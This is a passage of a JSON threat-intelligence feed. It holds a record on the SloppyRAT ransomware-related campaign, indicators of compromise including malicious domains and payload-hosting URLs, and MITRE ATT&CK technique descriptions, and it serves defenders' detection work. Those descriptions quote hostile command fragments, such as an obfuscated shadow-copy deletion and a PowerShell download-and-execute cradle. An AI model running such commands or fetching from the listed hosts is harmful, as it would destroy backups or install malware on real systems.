0.55, "events": 11.56, "sectors": [{"sector": "Various", "affected": 4.6, "events": 97.18, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 1.87, "events": 39.58, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-12", "nodes": 0.78, "events": 11.71, "sectors": [{"sector": "Unknown", "affected": 3.94, "events": 89.96, "total": 1000000}, {"sector": "Banking/Financial/Wealth Management", "affected": 250000, "events": 750000, "total": 1000000}, {"sector": "Government", "affected": 0.82, "events": 2.88, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 1.34, "events": 36.37, "total": 1000000}, {"iso_code": "TR", "affected": 24.01, "events": 67.21, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-13", "nodes": 0.39, "events": 10.85, "sectors": [{"sector": "Various", "affected": 3.28, "events": 91.27, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 1.34, "events": 37.18, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-14", "nodes": 0.7, "events": 11.79, "sectors": [{"sector": "Various", "affected": 2.28, "events": 38.18, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 1.87, "events": 39.32, "total": 1000000}, {"iso_code": "TR", "affected": 4.8, "events": 9.6, "total": 1000000}, {"iso_code": "VE", "affected": 38.3, "events": 38.3, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-15", "nodes": 0.78, "events": 17.33, "sectors": [{"sector": "Various", "affected": 6.57, "events": 145.77, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 2.41, "events": 38.78, "total": 1000000}, {"iso_code": "TR", "affected": 4.8, "events": 28.81, "total": 1000000}], "countriesTotalDevices": 1000000}, {"date": "2026-09-16", "nodes": 0.23, "events": 1.95, "sectors": [{"sector": "Various", "affected": 1.97, "events": 16.42, "total": 1000000}], "countries": [{"iso_code": "US", "affected": 0.8, "events": 6.69, "total": 1000000}], "countriesTotalDevices": 1000000}]}, {"id": "85ed6150-3203-4e7a-85ff-5bf7871099bf", "threat_level_id": 2, "description": "In June 2026, the SloppyRAT malware was identified, likely leveraged by ransomware-related threat actors to establish a foothold for lateral movement. The malware is delivered through a multi-stage ClickFix infection chain using finger.exe to download batch scripts, which deploy IronPython from GitHub to execute compressed Python code that ultimately loads CastleLoader, CastleRAT, and SloppyRAT DLL. SloppyRAT communicates over HTTPS with JSON-formatted messages and supports reverse SOCKS proxy capability for lateral movement within corporate networks. The malware employs multiple anti-analysis techniques including encrypted code blocks decrypted at runtime, junk code insertion, indirect system calls via Hell's Gate-style technique, and certificate pinning to prevent TLS MiTM network monitoring. SloppyRAT provides attackers with 47 built-in PowerShell-like commands implemented in C++ for remote access and system reconnaissance. The malware includes EtherHiding implementation using Polygon blockchain for C2 resolution as a backup channel. Notable software bugs impact persistence mechanisms - both Run registry and COM hijacking methods are implemented incorrectly and fail to execute properly.\r\n\r\nThe Trellix Threat Intelligence Group (TIG) gathers and analyzes information from multiple open and closed sources before disseminating intelligence reports. This campaign was researched by Zscaler and shared publicly https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks", "kb_article_link": null, "coverage": null, "external_analysis": {"links": ["https://www.zscaler.com/blogs/security-research/sloppyrat-new-tool-ransomware-attacks"]}, "is_coat": 0, "name": "Analysis Of SloppyRAT: A New Tool For Ransomware Attacks", "prevalence": {"countries": [{"iso_code": "US", "affected": 8.56, "events": 85.05, "total": 1000000}, {"iso_code": "DE", "affected": 0.52, "events": 6.74, "total": 1000000}], "events": 25.85, "nodes": 2.58, "sectors": [{"sector": "Unknown", "affected": 21.67, "events": 217.34, "total": 1000000}], "countriesTotalDevices": 1000000}, "iocs": [{"type": "ip_port", "value": "62.106.66.148:443"}, {"type": "domain", "value": "finger.linked4x.com"}, {"type": "domain", "value": "skipraid.com"}, {"type": "domain", "value": "stro7121.blob.core.windows.net"}, {"type": "domain", "value": "api.truesmart.org"}, {"type": "domain", "value": "api.telephoneip.net"}, {"type": "url", "value": "https://stro7121.blob.core.windows.net/dpp1/config.py"}, {"type": "url", "value": "https://stro7121.blob.core.windows.net/dpp1/hostfxr.dll"}, {"type": "url", "value": "https://backup-ubt.s3.us-east-1.amazonaws.com/hostfxr.dll"}, {"type": "url", "value": "https://skipraid.com/dsVGmQTrzX/default2"}, {"type": "url", "value": "https://github.com/IronLanguages/ironpython3/releases/download/v3.4.2/IronPython.3.4.2.zip"}, {"type": "md5", "value": "aade1a9d173cb903dfb8a33103f4f9e2"}, {"type": "sha1", "value": "b3d4f47be7a995e3452c1a8dc013b525cf1c654b"}, {"type": "sha256", "value": "9f84cfcf988530941555d1cb7780a091743cf567396201eff7731f5475768f9a"}, {"type": "md5", "value": "6ce535761404effecda8eaf6cb3099e5"}, {"type": "sha1", "value": "f711b142502b066e48b387793c77ed89562e30bd"}, {"type": "sha256", "value": "8774533134d9d1514106c4090a0c5bccab4550facdcfe03f4e02b9764343a990"}, {"type": "md5", "value": "c2aa0347af70fa648c5f3a95c5304321"}, {"type": "sha1", "value": "f17fa91e8e9f2fdf6a32c4bd0b3d2e63132377a3"}, {"type": "sha256", "value": "ff142fc192daa2a83bc565e5b38ebbe05561f3a19c7fc2d08e38c97e1986bbc5"}, {"type": "md5", "value": "ea04fd6f3ac3f3fe677a478519af623e"}, {"type": "sha1", "value": "664e9c11e16aaf7702f1ac154b4a1894cf23cb2e"}, {"type": "sha256", "value": "680c3a9f5fdddfcc34856c7a67d21bbdd2b47d70bdfb829ff59cfa0e3bc72d21"}, {"type": "md5", "value": "1c15653d8428e69ff2cadf3a3a1f506f"}, {"type": "sha256", "value": "bdcf8fe230e23692b658b62b6547374e2234f2a497b19d26637018a1839e6dfd"}, {"type": "sha1", "value": "7b52af88cbd890b1d547729adf40b8d94c7cace6"}, {"type": "md5", "value": "72a53c1433a477e68455faaa5eec1673"}, {"type": "sha1", "value": "7490257babada19a7b43852f321e129b775c8626"}, {"type": "sha256", "value": "607212cfe73c5c84b2dd95b2c0ff37a47f4c8aad08e6d5cbb7c19a62c6b765f9"}, {"type": "md5", "value": "07c8ce7b8a77b3918aeebf64629a1786"}, {"type": "sha1", "value": "94ac9aaeb666ed11dacf80cc16498e915e8c4b0f"}, {"type": "sha256", "value": "7bb025b426ae6ccbc170fbca58634b8dd77a61447e48dabe9c2e2fb0d339d8b7"}, {"type": "md5", "value": "8a41c5092060d21e2af8d7018fe5b4f6"}, {"type": "sha1", "value": "94150b6de01493a3f5e54f08788e8fd76f997412"}, {"type": "sha256", "value": "6d50bb50d4e7d6ac36ca6d2761f382be8e1ddbebf3cdf4733cf989ba291f9013"}, {"type": "md5", "value": "27d35578cfe795bb15017eb1a300e976"}, {"type": "sha1", "value": "31d8644edce527b21e72dec1b6aaa443b67c9cc7"}, {"type": "sha256", "value": "00c116e498799dc831c8aeb602349296c4b9325535d674fe2b6e2e091878dcec"}, {"type": "md5", "value": "fdd50138d5645405dd0b59246f2ab42b"}, {"type": "sha1", "value": "798351d53ce9c5c2999e7bba6c954f162aa34136"}, {"type": "sha256", "value": "93273ea09bd9df881a594db8cfe1b1bbc54f40f623f44427278ae96fb9b46490"}, {"type": "md5", "value": "8cc2fa24462090929403eefe79292635"}, {"type": "sha1", "value": "d697d1ef1132eed6900b43519238a23f42a5a007"}, {"type": "sha256", "value": "971f25f84be88c4fd304d555b5e3da12f6b368e4b9ba0943961ff21ba6fa4d4d"}, {"type": "md5", "value": "f52464f721825936cd1338eac49ece10"}, {"type": "sha1", "value": "d5435129570d9656dc7d9f6578a291d173025e4d"}, {"type": "sha256", "value": "a13fcbb0870f2fabb7e0a8c757ee3b763bd4a4b0cdf59eeff981d8e307fcf316"}, {"type": "md5", "value": "5966d07d4cb3a9241fe4df0ad70ad665"}, {"type": "sha1", "value": "70e1412bd5ff942cb85233764968349e0181683e"}, {"type": "sha256", "value": "518cd57a303ff7ac2b5c4c8439aa5bcbf9a287d4653de7b76051bde73a94d064"}, {"type": "md5", "value": "a8adad7f62ff0fd80a1af50c81a74b28"}, {"type": "sha1", "value": "a8634004c63c9c91b2a66fbe77aaec5eaf0af5b7"}, {"type": "sha256", "value": "3a8994928f512fffcb32e117ac45e0ee093541d99a9dba5f69a264f7f3054b19"}, {"type": "md5", "value": "fde4570129cfcc912790b25f37daefe5"}, {"type": "sha1", "value": "fbf1b66450c3eeecb7f4e7a729141ebf419a4c46"}, {"type": "sha256", "value": "2f3d95de716f330fad2330d8787ebdbecb3322453bdc41b2113427f9f92d32d2"}, {"type": "md5", "value": "16d9181bc44fcbf2e9b653830e77d1a0"}, {"type": "sha1", "value": "d4aa64d9034a551697897c441b6e786fda4d1802"}, {"type": "sha256", "value": "1439990ff65364a0f608a322aa3a493bc1683cb5fc30cffc44948da29623fffd"}, {"type": "md5", "value": "b2890531696bd9b393c937d7281a2d2f"}, {"type": "sha1", "value": "f48086f85848c91de41b9ba4ded024ae1427d2dc"}, {"type": "sha256", "value": "eaa52d2d6d4daf29157e8e813247fb2e92797324230ee42c79f7861b2f5c341d"}, {"type": "md5", "value": "058820a823f879dfa724704f193745f7"}, {"type": "sha1", "value": "3f6aba45e7f893fb89fe63789dd6e4d03b5eae35"}, {"type": "sha256", "value": "cb9930d0cde5bf8e8a7ad08fe2c60b937c7beaf9ab51b03191dfcaba40b7b189"}, {"type": "md5", "value": "802da8fb0829b7bf23ab6e982ccea4fd"}, {"type": "sha1", "value": "4fa6b11ae6f14d7ad730099ee5aa9aa37793e07d"}, {"type": "sha256", "value": "c0ef62a2d5ca11c2eedad3561d5d1d8b6e9847aa6b8613493e5bc233ece3d189"}, {"type": "md5", "value": "d5ffe392d48252968cf021a4e4040369"}, {"type": "sha1", "value": "44f9f023d82db88daf14658b17fdfbe2319184cc"}, {"type": "sha256", "value": "4ecb2d06510dfee1b67f5d9a68c60f6d09ddb5be36cc1766a41d77c5b89d3a56"}, {"type": "md5", "value": "5731f763100773be35669757b8accc95"}, {"type": "sha1", "value": "3f90411b3a3ed8cbe079db215a9bf68b9017a9fc"}, {"type": "sha256", "value": "466f9b8dce77b3a026fe4f833aa4949784fb854bea4137e52609e857d439dec8"}, {"type": "md5", "value": "abdad1a0d86b85e39b8dfb699f018a9c"}, {"type": "sha1", "value": "f4cd091cfd30fca012ec321ea0dd4a9a58c1c36b"}, {"type": "sha256", "value": "f534a957edec74d69081665309311b791b6d11a3221fffa67744812d73ad98eb"}], "galaxies": [{"id": "0b438db7-44cb-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver\u2019s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.\n\nFor efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).", "created_on": "2020-12-23T03:00:42.000Z", "name": "Asymmetric Cryptography"}, {"id": "254490ea-4c0e-4834-affe-60957697b869", "category": "trellix-tool", "description": "CastleLoader is a versatile malware loader that is used to distribute a range of malicious software, including various information stealers and remote access trojans. CastleLoader has demonstrated the capability to deploy other loaders, including Hijack Loader, highlighting its role as a flexible initial access tool in the malware landscape. It employs techniques like dead code injection and packing to complicate analysis, and upon unpacking itself at runtime, it connects to a command-and-control server to download and execute further malicious modules.", "created_on": "2025-08-12T16:14:35.000Z", "name": "CastleLoader"}, {"id": "9986a745-c546-4cf3-85d9-44e26d098af0", "category": "trellix-tool", "description": "Windows command interpreter, Cmd.exe. If used without parameters, cmd displays the version and copyright information of the operating system. Source: Microsoft", "created_on": "2021-08-04T21:00:38.000Z", "name": "Cmd"}, {"id": "6b646d82-f30c-4494-8f19-f7f70c689d6f", "category": "mitre-attack-pattern", "description": "Adversaries may obfuscate content during command execution to impede detection. Command-line obfuscation is a method of making strings and patterns within commands and scripts more difficult to signature and analyze. This type of obfuscation can be included within commands executed by delivered payloads (e.g., [Phishing](https://attack.mitre.org/techniques/T1566) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)) or interactively via [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).(Citation: Akamai JS)(Citation: Malware Monday VBE)\n\nFor example, adversaries may abuse syntax that utilizes various symbols and escape characters (such as spacing,  `^`, `+`. `$`, and `%`) to make commands difficult to analyze while maintaining the same intended functionality.(Citation: RC PowerShell) Many languages support built-in obfuscation in the form of base64 or URL encoding.(Citation: Microsoft PowerShellB64) Adversaries may also manually implement command obfuscation via string splitting (`\u201cWor\u201d+\u201cd.Application\u201d`), order and casing of characters (`rev <<<'dwssap/cte/ tac'`), globing (`mkdir -p '/tmp/:&$NiA'`), as well as various tricks involving passing strings through tokens/environment variables/input streams.(Citation: Bashfuscator Command Obfuscators)(Citation: FireEye Obfuscation June 2017)\n\nAdversaries may also use tricks such as directory traversals to obfuscate references to the binary being invoked by a command (`C:\\voi\\pcw\\..\\..\\Windows\\tei\\qs\\k\\..\\..\\..\\system32\\erool\\..\\wbem\\wg\\je\\..\\..\\wmic.exe shadowcopy delete`).(Citation: Twitter Richard WMIC)\n\nTools such as <code>Invoke-Obfuscation</code> and <code>Invoke-DOSfucation</code> have also been used to obfuscate commands.(Citation: Invoke-DOSfuscation)(Citation: Invoke-Obfuscation)", "created_on": "2023-06-12T21:12:23.000Z", "name": "Command Obfuscation"}, {"id": "29ca14b1-4134-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model)  References to various COM objects are stored in the Registry. \n\nAdversaries may use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. \n\nOne variation of COM hijacking involves abusing Type Libraries (TypeLibs), which provide metadata about COM objects, such as their interfaces and methods. Adversaries may modify Registry keys associated with TypeLibs to redirect legitimate COM object functionality to malicious scripts or payloads. Unlike traditional COM hijacking, which commonly uses local DLLs, this variation may leverage the \"script:\" moniker to execute remote scripts hosted on external servers.(Citation: RELIAQUEST) This approach enables stealthy execution of code while maintaining persistence, as the remote payload would be automatically downloaded whenever the hijacked COM object is accessed.", "created_on": "2020-12-18T13:23:06.000Z", "name": "Component Object Model Hijacking"}, {"id": "516bd65c-cca7-4777-ad7d-b29be88dd809", "category": "trellix-tool", "description": "Curl is a command-line tool for transferring data specified with URL syntax.\r\nSource: https://github.com/curl/curl", "created_on": "2021-10-27T15:57:11.000Z", "name": "curl"}, {"id": "c3dcf574-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may use [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.\n\nOne such example is the use of [certutil](https://attack.mitre.org/software/S0160) to decode a remote access tool portable executable file that has been hidden inside a certificate file.(Citation: Malwarebytes Targeted Attack against Saudi Arabia) Another example is using the Windows <code>copy /b</code> or <code>type</code> command to reassemble binary fragments into a malicious payload.(Citation: Carbon Black Obfuscation Sept 2016)(Citation: Sentinel One Tainted Love 2023)\n\nSometimes a user's action may be required to open it for deobfuscation or decryption as part of [User Execution](https://attack.mitre.org/techniques/T1204). The user may also be required to input a password to open a password protected compressed/encrypted file that was provided by the adversary.(Citation: Volexity PowerDuke November 2016)", "created_on": "2020-02-26T13:49:10.000Z", "name": "Deobfuscate/Decode Files or Information"}, {"id": "eafe3771-2b7c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)\n\nAdversaries may trigger a denial-of-service attack via legitimate system processes. It has been previously observed that the Windows Time Travel Debugging (TTD) monitor driver can be used to initiate a debugging session for a security tool (e.g., an EDR) and render the tool non-functional.  By hooking the debugger into the EDR process, all child processes from the EDR will be automatically suspended. The attacker can terminate any EDR helper processes (unprotected by Windows Protected Process Light) by abusing the Process Explorer driver. In combination this will halt any attempt to restart services and cause the tool to crash.(Citation: Cocomazzi FIN7 Reboot)\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) For example, adversaries may abuse the Windows process mitigation policy to block certain endpoint detection and response (EDR) products from loading their user-mode code via DLLs. By spawning a process with the PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON attribute using API calls like UpdateProcThreadAttribute, adversaries may evade detection by endpoint security solutions that rely on DLLs that are not signed by Microsoft. Alternatively, they may add new directories to an EDR tool\u2019s exclusion list, enabling them to hide malicious files via [File/Path Exclusions](https://attack.mitre.org/techniques/T1564/012).(Citation: BlackBerry WhisperGate 2022)(Citation: Google Cloud Threat Intelligence FIN13 2021)\n\nAdversaries may also focus on specific applications such as Sysmon. For example, the \u201cStart\u201d and \u201cEnable\u201d values in <code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) \n\nOn network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)\n\nIn cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.\n\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)\n\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)", "created_on": "2020-11-20T22:08:28.000Z", "name": "Disable or Modify Tools"}, {"id": "aeddd759-fd26-4ad5-9a59-356196e62972", "category": "mitre-attack-pattern", "description": "Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use.\n\nThis type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding schemes such as Base64.\n\nThe entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection.\n\nFor example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File) \n\nAdversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution.", "created_on": "2024-05-23T21:13:59.000Z", "name": "Encrypted/Encoded File"}, {"id": "c3e4c145-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. <code>dir</code>, <code>show flash</code>, and/or <code>nvram</code>).(Citation: US-CERT-TA18-106A)\n\nSome files and directories may require elevated or specific user permissions to access.", "created_on": "2020-02-26T13:49:10.000Z", "name": "File and Directory Discovery"}, {"id": "f7f99d76-33cc-43d6-b619-fbbae06c97da", "category": "trellix-tool", "description": "The finger command is a utility used to retrieve and view detailed user information from a remote computer, which is usually a UNIX system running the designated finger service. When executed without any additional parameters, the command simply provides helpful instruction and usage guidelines.", "created_on": "2024-03-29T21:14:00.000Z", "name": "finger"}, {"id": "c57da8d9-2b58-43f1-a058-bcf1588f147d", "category": "trellix-tool", "description": "The for command is used to execute a specific command repeatedly, once for each file within a defined group of files.", "created_on": "2025-11-18T00:16:53.000Z", "name": "for (command)"}, {"id": "a8ab0689-973a-427d-92cc-90bc1fc8118f", "category": "trellix-tool", "description": "GitHub is a web-based platform used for version control and collaboration on software development projects. It provides tools for developers to host and review code, manage projects, track changes, and collaborate with other team members or contributors. GitHub uses Git, a distributed version control system, allowing developers to track changes made to code over time, revert to previous versions if needed, and work on code collaboratively with others. It is widely used by individuals, open-source projects, and businesses to streamline software development processes and facilitate collaboration among developers worldwide.", "created_on": "2024-04-03T21:15:07.000Z", "name": "GitHub"}, {"id": "c4685e8c-589e-11ea-8942-06365ef617e6", "category": "mitre-attack-pattern", "description": "Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). \n\nOn Windows, adversaries may use various utilities to download tools, such as `copy`, `finger`, [certutil](https://attack.mitre.org/software/S0160), and [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as `curl`, `scp`, `sftp`, `tftp`, `rsync`, `finger`, and `wget`.(Citation: t1105_lolbas)  A number of these tools, such as `wget`, `curl`, and `scp`, also exist on ESXi. After downloading a file, a threat actor may attempt to verify its integrity by checking its hash value (e.g., via `certutil -hashfile`).(Citation: Google Cloud Threat Intelligence COSCMICENERGY 2023)\n\nAdversaries may also abuse installers and package managers, such as `yum` or `winget`, to download tools to victim hosts. Adversaries have also abused file application features, such as the Windows `search-ms` protocol handler, to deliver malicious files to victims through remote file searches invoked by [User Execution](https://attack.mitre.org/techniques/T1204) (typically after interacting with [Phishing](https://attack.mitre.org/techniques/T1566) lures).(Citation: T1105: Trellix_search-ms)\n\nFiles can also be transferred using various [Web Service](https://attack.mitre.org/techniques/T1102)s as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016) In some cases, adversaries may be able to leverage services that sync between a web-based and an on-premises client, such as Dropbox or OneDrive, to transfer files onto victim systems. For example, by compromising a cloud account and logging into the service's web portal, an adversary may be able to trigger an automatic syncing process that transfers the file onto the victim's machine.(Citation: Dropbox Malware Sync)", "created_on": "2020-02-26T13:49:11.000Z", "name": "Ingress Tool Transfer"}, {"id": "0b389e29-44cb-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.\n\nBy using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.", "created_on": "2020-12-23T03:00:42.000Z", "name": "Internal Proxy"}, {"id": "7ed1d9c8-70f7-4329-813c-44d57fd00ffb", "category": "trellix-tool", "description": "IronPython is an open-source implementation of the Python programming language which is tightly integrated with the .NET Framework. IronPython can use the .NET Framework and Python libraries, and other .NET languages can use Python code just as easily.", "created_on": "2026-07-21T16:11:00.000Z", "name": "IronPython"}, {"id": "0ca0d293-5c5e-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.\n\nCommands such as <code>net user</code> and <code>net localgroup</code> of the [Net](https://attack.mitre.org/software/S0039) utility and <code>id</code> and <code>groups</code> on macOS and Linux can list local users and groups.(Citation: Mandiant APT1)(Citation: id man page)(Citation: groups man page) On Linux, local users can also be enumerated through the use of the <code>/etc/passwd</code> file. On macOS, the <code>dscl . list /Users</code> command can be used to enumerate local accounts. On ESXi servers, the `esxcli system account list` command can list local user accounts.(Citation: Crowdstrike Hypervisor Jackpotting Pt 2 2021)", "created_on": "2021-01-22T03:00:57.000Z", "name": "Local Account"}, {"id": "b1d80661-2788-4eaa-b086-93b934fd1404", "category": "mitre-attack-pattern", "description": "Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n\nCommands such as <code>net localgroup</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscl . -list /Groups</code> on macOS, and <code>groups</code> on Linux can list local groups.", "created_on": "2021-09-08T19:12:04.000Z", "name": "Local Groups"}, {"id": "02fe61b3-0173-4e05-946d-319688470e41", "category": "mitre-attack-pattern", "description": "An adversary may rely upon a user copying and pasting code in order to gain execution. Users may be subjected to social engineering to get them to copy and paste code directly into a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059). One such strategy is \"ClickFix,\" in which adversaries present users with seemingly helpful solutions\u2014such as prompts to fix errors or complete CAPTCHAs\u2014that instead instruct the user to copy and paste malicious code.\n\nMalicious websites, such as those used in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), may present fake error messages or CAPTCHA prompts that instruct users to open a terminal or the Windows Run Dialog box and execute an arbitrary command. These commands may be obfuscated using encoding or other techniques to conceal malicious intent. Once executed, the adversary will typically be able to establish a foothold on the victim's machine.(Citation: CloudSEK Lumma Stealer 2024)(Citation: Sekoia ClickFake 2025)(Citation: Reliaquest CAPTCHA 2024)(Citation: AhnLab LummaC2 2025)\n\nAdversaries may also leverage phishing emails for this purpose. When a user attempts to open an attachment, they may be presented with a fake error and offered a malicious command to paste as a solution, consistent with the \"ClickFix\" strategy.(Citation: Proofpoint ClickFix 2024)(Citation: AhnLab Malicioys Copy Paste 2024)\n\nTricking a user into executing a command themselves may help to bypass email filtering, browser sandboxing, or other mitigations designed to protect users against malicious downloaded files. ", "created_on": "2025-07-25T16:14:04.000Z", "name": "Malicious Copy and Paste"}, {"id": "bce5e493-305c-11eb-9477-02d538d9640e", "category": "mitre-attack-pattern", "description": "An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, .reg, and .iso.(Citation: Mandiant Trojanized Windows 10)\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs) \n\nWhile [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).", "created_on": "2020-11-27T03:00:42.000Z", "name": 